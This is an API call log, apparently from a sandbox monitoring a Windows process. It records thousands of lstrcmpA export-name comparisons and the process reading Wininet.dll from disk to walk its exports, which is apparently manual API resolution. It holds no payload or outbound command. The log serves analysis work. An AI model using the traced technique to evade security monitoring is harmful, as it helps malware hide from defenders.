lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.682] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0132.682] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.683] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.684] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0132.684] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0132.684] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0132.684] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0132.684] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0132.684] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0132.685] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0132.685] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0132.685] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0132.685] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0132.685] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0132.685] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0132.686] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0132.686] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0132.687] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0132.687] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0132.687] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0132.687] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0132.687] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0132.687] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0132.687] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0132.687] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0132.688] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0132.689] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0133.901] GetProcessHeap () returned 0x470000 [0133.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49d060 | out: hHeap=0x470000) returned 1 [0133.901] GetProcessHeap () returned 0x470000 [0133.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489df0 [0133.901] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0133.914] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0133.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0133.915] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0133.915] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0133.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0133.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0133.915] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0133.915] GetProcessHeap () returned 0x470000 [0133.915] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x286600) returned 0x4154040 [0133.922] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0133.922] ReadFile (in: hFile=0x140, lpBuffer=0x4154040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4154040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0134.623] CloseHandle (hObject=0x140) returned 1 [0134.623] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0134.623] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0134.623] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0134.623] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0134.623] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0134.624] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0134.624] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0134.624] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0134.624] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0134.624] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0134.625] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0134.625] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0134.625] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0134.626] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 